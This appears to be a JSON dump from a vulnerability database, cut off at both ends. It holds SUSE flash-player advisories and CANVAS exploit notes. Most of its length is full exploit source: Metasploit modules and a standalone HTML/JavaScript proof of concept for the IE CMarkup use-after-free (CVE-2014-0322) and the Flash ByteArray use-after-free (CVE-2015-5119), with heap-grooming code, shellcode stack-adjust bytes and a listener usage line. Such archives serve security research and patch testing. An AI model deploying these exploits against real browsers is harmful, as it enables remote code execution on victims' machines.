Vulnerabilities that could be exploited to bypass the\n same-origin-policy and lead to information disclosure (bsc#937339).\n\n", "modified": "2015-07-09T14:08:22", "published": "2015-07-09T14:08:22", "id": "SUSE-SU-2015:1214-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00018.html", "type": "suse", "title": "Security update for flash-player (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:05:46", "bulletinFamily": "unix", "description": "flash-player was updated to fix 35 security issues.\n\n These security issues were fixed:\n - CVE-2015-3135, CVE-2015-4432, CVE-2015-5118: Heap buffer overflow\n vulnerabilities that could lead to code execution (bsc#937339).\n - CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431: Memory corruption vulnerabilities that\n could lead to code execution (bsc#937339).\n - CVE-2015-3126, CVE-2015-4429: Null pointer dereference issues\n (bsc#937339).\n - CVE-2015-3114: A security bypass vulnerability that could lead to\n information disclosure (bsc#937339).\n - CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122,\n CVE-2015-4433: Type confusion vulnerabilities that could lead to code\n execution (bsc#937339).\n - CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127,\n CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430,\n CVE-2015-5119: Use-after-free vulnerabilities that could lead to code\n execution (bsc#937339).\n - CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116: Vulnerabilities that could be exploited to bypass the\n same-origin-policy and lead to information disclosure (bsc#937339).\n\n", "modified": "2015-07-09T11:08:12", "published": "2015-07-09T11:08:12", "id": "SUSE-SU-2015:1211-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00017.html", "type": "suse", "title": "Security update for flash-player (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2016-09-25T14:13:59", "bulletinFamily": "exploit", "description": "**Name**| ie_cmarkup \n---|--- \n**CVE**| CVE-2014-0322 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| ie_cmarkup \n**Notes**| CVE Name: CVE-2014-0322 \nVENDOR: Microsoft \nNOTES: \n\\- This exploits leaks a vtable pointer of a mshtml object in order to bypass ASLR \n\\- We also leak the shellcode's address so there's no need for spraying the shellcode \n \nThis exploit has been tested on: \n\\- Windows 7 Professional (x86) SP 1 on IE 10 \n\\- Windows 7 Enterprise (x86) SP 1 on IE 10 \n \nThe following mshtml versions are vulnerables and has been tested: \n\\- 10.00.9200.16521 \n \nRepeatability: Single \nReferences: URL:http://technet.microsoft.com/security/bulletin/MS14-012 \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0322 \n\n", "modified": "2014-02-14T11:55:07", "published": "2014-02-14T11:55:07", "id": "IE_CMARKUP", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ie_cmarkup", "type": "canvas", "title": "Immunity Canvas: IE_CMARKUP", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-25T14:12:47", "bulletinFamily": "exploit", "description": "**Name**| adobe_flash_valueof \n---|--- \n**CVE**| CVE-2015-5119 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| adobe_flash_valueof \n**Notes**| CVE Name: CVE-2015-5119 \nVENDOR: Adobe \nNotes: \n \nTested on: \n\\- Windows 7 x86/x64 IE(32/64) 8, 9, 11 \n \nThis module exploits a use after free vulnerability on Adobe Flash Player. \nWhen you have a ByteArray object ba, and perform an assignment like this ba[0] = object, it will call this object's ValueOf function \nThe ValueOf function can be overridden, so someone can change value of ba in the object ValueOf function \nIf you reallocate the ba memory in the ValueOf function, it will cause a UAF because ba[0] = object will save the original memory and use it after ValueOf function has been called. \n \nIMPORTANT: \n \nYou need to setup a WIN64 MOSDEF INTEL listener in order for the callback \nprocess to work, as the InjectToSelf shellcode doesn't support Universal MOSDEF \nyet. \n \nUsage: \npython ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:adobe_flash_valueof -O auto_detect_exploits:0 \npython commandlineInterface.py -v 17 -p5555 \n \nVersionsAffected: Adobe Flash Player &gt; 9 and before 18.0.0.194 on Windows \nRepeatability: One-shot \nReferences: ['http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'] \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5119 \n\n", "modified": "2015-07-08T10:59:05", "published": "2015-07-08T10:59:05", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/adobe_flash_valueof", "id": "ADOBE_FLASH_VALUEOF", "type": "canvas", "title": "Immunity Canvas: ADOBE_FLASH_VALUEOF", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:04", "bulletinFamily": "exploit", "description": "", "modified": "2014-04-16T00:00:00", "published": "2014-04-16T00:00:00", "href": "https://packetstormsecurity.com/files/126178/MS14-012-Microsoft-Internet-Explorer-CMarkup-Use-After-Free.html", "id": "PACKETSTORM:126178", "type": "packetstorm", "title": "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free\", \n'Description' => %q{ \nThis module exploits an use after free condition on Internet Explorer as used in the wild \non the \"Operation SnowMan\" in February 2014. The module uses Flash Player 12 in order to \nbypass ASLR and finally DEP. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Vulnerability discovery and Exploit in the wild \n'Jean-Jamil Khalife', # Exploit \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2014-0322' ], \n[ 'MSB', 'MS14-012' ], \n[ 'BID', '65551' ], \n[ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html'], \n[ 'URL', 'http://hdwsec.fr/blog/CVE-2014-0322.html' ] \n], \n'Platform' => 'win', \n'Arch' => ARCH_X86, \n'Payload' => \n{ \n'Space' => 960, \n'DisableNops' => true, \n'PrependEncoder' => stack_adjust \n}, \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:os_name => Msf::OperatingSystems::WINDOWS, \n:os_flavor => Msf::OperatingSystems::WindowsVersions::SEVEN, \n:ua_name => Msf::HttpClients::IE, \n:ua_ver => '10.0', \n:mshtml_build => lambda { |ver| ver.to_i < 16843 }, \n:flash => /^12\\./ \n}, \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f', \n'Retries' => false \n}, \n'Targets' => \n[ \n[ 'Windows 7 SP1 / IE 10 / FP 12', { } ], \n], \n'Privileged' => false, \n'DisclosureDate' => \"Feb 13 2014\", \n'DefaultTarget' => 0)) \n \nend \n \ndef stack_adjust \nadjust = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb \nadjust << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit \nadjust << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit \nadjust << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset \n \nadjust \nend \n \ndef create_swf \npath = ::File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2014-0322\", \"AsXploit.swf\" ) \nfd = ::File.open( path, \"rb\" ) \nswf = fd.read(fd.stat.size) \nfd.close \nreturn swf \nend \n \ndef exploit \n@swf = create_swf \nsuper \nend \n \ndef on_request_uri(cli, request) \nprint_status(\"Request: #{request.uri}\") \n \nif request.uri =~ /\\.swf$/ \nprint_status(\"Sending SWF...\") \nsend_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) \nreturn \nend \n \nsuper \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"Sending HTML...\") \nsend_exploit_html(cli, exploit_template(cli, target_info)) \nend \n \ndef exploit_template(cli, target_info) \n \nflash_payload = \"\" \nget_payload(cli,target_info).unpack(\"V*\").each do |i| \nflash_payload << \"0x#{i.to_s(16)},\" \nend \nflash_payload.gsub!(/,$/, \"\") \n \nhtml_template = %Q| \n<html> \n<head> \n</head> \n<body> \n \n<script> \n \nvar g_arr = []; \nvar arrLen = 0x250; \n \nfunction dword2data(dword) \n{ \nvar d = Number(dword).toString(16); \nwhile (d.length < 8) \nd = '0' + d; \n \nreturn unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4)); \n} \n \nfunction eXpl() \n{ \nvar a=0; \n \nfor (a=0; a < arrLen; a++) { \ng_arr[a] = document.createElement('div'); \n} \n \nvar b = dword2data(0x19fffff3); \n \nwhile (b.length < 0x360) { \nif (b.length == (0x98 / 2)) \n{ \nb += dword2data(0x1a000010); \n} \nelse if (b.length == (0x94 / 2)) \n{ \nb += dword2data(0x1a111111); \n} \nelse if (b.length == (0x15c / 2)) \n{ \nb += dword2data(0x42424242); \n} \nelse \n{ \nb += dword2data(0x19fffff3); \n} \n} \n \nvar d = b.substring(0, ( 0x340 - 2 )/2); \n \ntry{ \nthis.outerHTML=this.outerHTML \n} catch(e){ \n \n} \n \nCollectGarbage(); \n \nfor (a=0; a < arrLen; a++) \n{ \ng_arr[a].title = d.substring(0, d.length); \n} \n} \n \nfunction trigger() \n{ \nvar a = document.getElementsByTagName(\"script\"); \nvar b = a[0]; \nb.onpropertychange = eXpl; \nvar c = document.createElement('SELECT'); \nc = b.appendChild(c); \n} \n \n</script> \n<embed src=#{rand_text_alpha(4 + rand(3))}.swf FlashVars=\"version=<%=flash_payload%>\" width=\"10\" height=\"10\"> \n</embed> \n</body> \n</html> \n| \n \nreturn html_template, binding() \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126178/ms14_012_cmarkup_uaf.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:18:27", "bulletinFamily": "exploit", "description": "", "modified": "2014-04-14T00:00:00", "published": "2014-04-14T00:00:00", "href": "https://packetstormsecurity.com/files/126150/MS14-012-Internet-Explorer-CMarkup-Use-After-Free.html", "id": "PACKETSTORM:126150", "type": "packetstorm", "title": "MS14-012 Internet Explorer CMarkup Use-After-Free", "sourceData": "`<!-- \nMS14-012 Internet Explorer CMarkup Use-After-Free \nVendor Homepage: http://www.microsoft.com \nVersion: IE 10 \nDate: 2014-03-31 \nExploit Author: Jean-Jamil Khalife \nTested on: Windows 7 SP1 x64 (fr, en) \nFlash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77) \nHome: http://www.hdwsec.fr \nBlog : http://www.hdwsec.fr/blog/ \nMS14-012 / CVE-2014-0322 \n \nGeneration: \nc:\\mxmlc\\bin>mxmlc.exe AsXploit.as -o AsXploit.swf \n \nE-DB Note: http://www.exploit-db.com/sploits/32851-AsXploit.as \n \n--> \n \n<html> \n<head> \n</head> \n<body> \n \n<script> \n \nvar g_arr = []; \nvar arrLen = 0x250; \n \nfunction dword2data(dword) \n{ \nvar d = Number(dword).toString(16); \nwhile (d.length < 8) \nd = '0' + d; \n \nreturn unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4)); \n} \n \nfunction eXpl() \n{ \nvar a=0; \n \nfor (a=0; a < arrLen; a++) { \ng_arr[a] = document.createElement('div'); \n} \n \n// Build a new object \nvar b = dword2data(0x19fffff3); \nwhile (b.length < 0x360) \n{ \n// mov eax,dword ptr [esi+98h] \n// ... \n// mov eax,dword ptr [eax+8] \n// and dword ptr [eax+2F0h],0FFFFFFBFh \nif (b.length == (0x98 / 2)) \n{ \nb += dword2data(0x1a000010); \n} \n// mov ecx,dword ptr [edx+94h] \n// mov eax,dword ptr [ecx+0Ch] \nelse if (b.length == (0x94 / 2)) \n{ \nb += dword2data(0x1a111111); \n} \n// mov eax,dword ptr [edx+15Ch] \n// mov ecx,dword ptr [eax+edx*8] \nelse if (b.length == (0x15c / 2)) \n{ \nb += dword2data(0x42424242); \n} \nelse \n{ \nb += dword2data(0x19fffff3); \n} \n} \n \nvar d = b.substring(0, ( 0x340 - 2 )/2); \n \n// trigger \ntry{ \nthis.outerHTML=this.outerHTML \n} \ncatch(e){ \n \n} \n \nCollectGarbage(); \n \n// Replace freed object \nfor (a=0; a < arrLen; a++) \n{ \ng_arr[a].title = d.substring(0, d.length); \n} \n} \n \n// Trigger the vulnerability \nfunction trigger() \n{ \nvar a = document.getElementsByTagName(\"script\"); \nvar b = a[0]; \nb.onpropertychange = eXpl; \nvar c = document.createElement('SELECT'); \nc = b.appendChild(c); \n} \n \n \n \n</script> \n<embed src=AsXploit.swf width=\"10\" height=\"10\"></embed> \n</body> \n</html> \n \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126150/msiecmarkup-uaf.txt"}, {"lastseen": "2016-12-05T22:11:30", "bulletinFamily": "exploit", "description": "", "modified": "2015-07-08T00:00:00", "published": "2015-07-08T00:00:00", "href": "https://packetstormsecurity.com/files/132600/Adobe-Flash-Player-ByteArray-Use-After-Free.html", "id": "PACKETSTORM:132600", "type": "packetstorm", "title": "Adobe Flash Player ByteArray Use After Free", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player ByteArray Use After Free', \n'Description' => %q{ \nThis module exploits an use after free on Adobe Flash Player. The vulnerability, \ndiscovered by Hacking Team and made public on its July 2015 data leak, was \ndescribed as an Use After Free while handling ByteArray objects. This module has \nbeen tested successfully on: \n \nWindows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, \nWindows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, \nWindows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, \nWindows 8.1 (32-bit), IE11 and Flash 17.0.0.169, and \nLinux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Someone from HackingTeam \n'juan vazquez', # msf module \n'sinn3r' # msf module \n], \n'References' => \n[ \n['CVE', '2015-5119'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-03.html'], \n['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'], \n['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816'] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'Platform' => ['win', 'linux'], \n'Arch' => [ARCH_X86], \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:arch => ARCH_X86, \n:os_name => lambda do |os| \nos =~ OperatingSystems::Match::LINUX || \nos =~ OperatingSystems::Match::WINDOWS_7 || \nos =~ OperatingSystems::Match::WINDOWS_81 || \nos =~ OperatingSystems::Match::WINDOWS_VISTA || \nos =~ OperatingSystems::Match::WINDOWS_XP \nend, \n:ua_name => lambda do |ua| \ncase target.name \nwhen 'Windows' \nreturn true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF \nwhen 'Linux' \nreturn true if ua == Msf::HttpClients::FF \nend \n \nfalse \nend, \n:flash => lambda do |ver| \ncase target.name \nwhen 'Windows' \n# Note: Chrome might be vague about the version. \n# Instead of 18.0.0.203, it just says 18.0 \nreturn true if Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194') \nwhen 'Linux' \nreturn true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468') \nend \n \nfalse \nend \n}, \n'Targets' => \n[ \n[ 'Windows', \n{ \n'Platform' => 'win' \n} \n], \n[ 'Linux', \n{ \n'Platform' => 'linux' \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jul 06 2015', \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n@swf = create_swf \n \nsuper \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"Request: #{request.uri}\") \n \nif request.uri =~ /\\.swf$/ \nprint_status('Sending SWF...') \nsend_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) \nreturn \nend \n \nprint_status('Sending HTML...') \nsend_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) \nend \n \ndef exploit_template(cli, target_info) \nswf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\" \ntarget_payload = get_payload(cli, target_info) \nb64_payload = Rex::Text.encode_base64(target_payload) \nos_name = target_info[:os_name] \n \nif target.name =~ /Windows/ \nplatform_id = 'win' \nelsif target.name =~ /Linux/ \nplatform_id = 'linux' \nend \n \nhtml_template = %Q|<html> \n<body> \n<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" /> \n<param name=\"movie\" value=\"<%=swf_random%>\" /> \n<param name=\"allowScriptAccess\" value=\"always\" /> \n<param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" /> \n<param name=\"Play\" value=\"true\" /> \n<embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/> \n</object> \n</body> \n</html> \n| \n \nreturn html_template, binding() \nend \n \ndef create_swf \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5119', 'msf.swf') \nswf = ::File.open(path, 'rb') { |f| swf = f.read } \n \nswf \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132600/adobe_flash_hacking_team_uaf.rb.txt"}], "metasploit": [{"lastseen": "2019-04-15T07:55:31", "bulletinFamily": "exploit", "description": "This module exploits an use after free condition on Internet Explorer as used in the wild as part of \"Operation SnowMan\" in February 2014. The module uses Flash Player 12 in order to bypass ASLR and DEP.", "modified": "2017-07-24T13:26:21", "published": "2014-04-15T22:55:24", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MS14_012_CMARKUP_UAF", "href": "", "type": "metasploit", "title": "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free\",\n 'Description' => %q{\n This module exploits an use after free condition on Internet Explorer as used in the wild\n as part of \"Operation SnowMan\" in February 2014. The module uses Flash Player 12 in order to\n bypass ASLR and DEP.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery and Exploit in the wild\n 'Jean-Jamil Khalife', # Exploit\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2014-0322' ],\n [ 'MSB', 'MS14-012' ],\n [ 'BID', '65551' ],\n [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html'],\n [ 'URL', 'http://hdwsec.fr/blog/CVE-2014-0322.html' ]\n ],\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Payload' =>\n {\n 'Space' => 960,\n 'DisableNops' => true,\n 'PrependEncoder' => stack_adjust\n },\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :os_name => 'Windows 7',\n :ua_name => Msf::HttpClients::IE,\n :ua_ver => '10.0',\n :mshtml_build => lambda { |ver| ver.to_i < 16843 },\n :flash => /^1[23]\\./\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n 'Retries' => false\n },\n 'Targets' =>\n [\n [ 'Windows 7 SP1 / IE 10 / FP 12', { } ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Feb 13 2014\",\n 'DefaultTarget' => 0))\n\n end\n\n def stack_adjust\n adjust = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb\n adjust << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit\n adjust << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit\n adjust << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset\n\n adjust\n end\n\n def create_swf\n path = ::File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2014-0322\", \"AsXploit.swf\" )\n fd = ::File.open( path, \"rb\" )\n swf = fd.read(fd.stat.size)\n fd.close\n return swf\n end\n\n def exploit\n @swf = create_swf\n super\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status(\"Sending SWF...\")\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})\n return\n end\n\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Sending HTML...\")\n send_exploit_html(cli, exploit_template(cli, target_info))\n end\n\n def exploit_template(cli, target_info)\n\n flash_payload = \"\"\n padded_payload = get_payload(cli,target_info)\n\n while padded_payload.length % 4 != 0\n padded_payload += \"\\x00\"\n end\n\n padded_payload.unpack(\"V*\").each do |i|\n flash_payload << \"0x#{i.to_s(16)},\"\n end\n flash_payload.gsub!(/,$/, \"\")\n\n html_template = %Q|\n <html>\n <head>\n </head>\n <body>\n\n <script>\n\n var g_arr = [];\n var arrLen = 0x250;\n\n function dword2data(dword)\n {\n var d = Number(dword).toString(16);\n while (d.length < 8)\n d = '0' + d;\n\n return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));\n }\n\n function eXpl()\n {\n var a=0;\n\n for (a=0; a < arrLen; a++) {\n g_arr[a] = document.createElement('div');\n }\n\n var b = dword2data(0x19fffff3);\n\n while (b.length < 0x360) {\n if (b.length == (0x98 / 2))\n {\n b += dword2data(0x1a000010);\n }\n else if (b.length == (0x94 / 2))\n {\n b += dword2data(0x1a111111);\n }\n else if (b.length == (0x15c / 2))\n {\n b += dword2data(0x42424242);\n }\n else\n {\n b += dword2data(0x19fffff3);\n }\n }\n\n var d = b.substring(0, ( 0x340 - 2 )/2);\n\n try{\n this.outerHTML=this.outerHTML\n } catch(e){\n\n }\n\n CollectGarbage();\n\n for (a=0; a < arrLen; a++)\n {\n g_arr[a].title = d.substring(0, d.length);\n }\n }\n\n function trigger()\n {\n var a = document.getElementsByTagName(\"script\");\n var b = a[0];\n b.onpropertychange = eXpl;\n var c = document.createElement('SELECT');\n c = b.appendChild(c);\n }\n\n </script>\n <embed src=#{rand_text_alpha(4 + rand(3))}.swf FlashVars=\"version=<%=flash_payload%>\" width=\"10\" height=\"10\">\n </embed>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb"}, {"lastseen": "2019-04-29T12:27:48", "bulletinFamily": "exploit", "description": "This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public as part of the July 2015 data leak, was described as an Use After Free while handling ByteArray objects. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.", "modified": "2018-08-27T18:11:22", "published": "2015-07-07T16:19:48", "id": "MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_HACKING_TEAM_UAF", "href": "", "type": "metasploit", "title": "Adobe Flash Player ByteArray Use After Free", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player ByteArray Use After Free',\n 'Description' => %q{\n This module exploits an use after free on Adobe Flash Player. The vulnerability,\n discovered by Hacking Team and made public as part of the July 2015 data leak, was\n described as an Use After Free while handling ByteArray objects. This module has\n been tested successfully on:\n\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,\n Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\n Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Someone from HackingTeam\n 'juan vazquez', # msf module\n 'sinn3r' # msf module\n ],\n 'References' =>\n [\n ['CVE', '2015-5119'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-03.html'],\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],\n ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['win', 'linux'],\n 'Arch' => [ARCH_X86],\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :arch => ARCH_X86,\n :os_name => lambda do |os|\n os =~ OperatingSystems::Match::LINUX ||\n os =~ OperatingSystems::Match::WINDOWS_7 ||\n os =~ OperatingSystems::Match::WINDOWS_81 ||\n os =~ OperatingSystems::Match::WINDOWS_VISTA ||\n os =~ OperatingSystems::Match::WINDOWS_XP\n end,\n :ua_name => lambda do |ua|\n case target.name\n when 'Windows'\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\n when 'Linux'\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n :flash => lambda do |ver|\n case target.name\n when 'Windows'\n return true if Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')\n when 'Linux'\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [ 'Windows',\n {\n 'Platform' => 'win'\n }\n ],\n [ 'Linux',\n {\n 'Platform' => 'linux'\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jul 06 2015',\n 'DefaultTarget' => 0,\n 'Notes' =>\n {\n 'AKA' => ['0DayFlush']\n }\n ))\n end\n\n def exploit\n @swf = create_swf\n\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status('Sending SWF...')\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n\n if target.name =~ /Windows/\n platform_id = 'win'\n elsif target.name =~ /Linux/\n platform_id = 'linux'\n end\n\n html_template = %Q|<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" 